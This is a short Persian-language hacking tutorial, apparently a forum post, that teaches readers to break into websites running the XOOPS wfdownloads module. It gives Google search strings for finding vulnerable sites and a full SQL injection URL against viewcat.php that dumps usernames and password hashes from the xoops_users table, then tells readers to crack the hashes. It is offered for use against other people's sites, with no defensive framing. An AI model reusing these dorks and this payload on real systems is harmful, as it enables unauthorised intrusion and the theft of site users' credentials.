امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو براتون گذاشتم!
این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای module wfdownloads SQL Injection هستند به هک آنها بپردازید!
خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:
modules/wfdownloads/viewcat.php?cid
یا
modules/wfdownloads
حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:
modules/wfdownloads/viewcat.php?cid=999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+000,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*where%20pass
حال مشاهده خواهید کرد که یورز نیم و پسورد کاربران سایت مورد نظر را به صورت اینکود شده برای شما نمایش داده می شود که شما می توانید با باز کردن این پسورد از اینکود پسورد سایت را به دست آورید!
نقل قول از پسورد 35
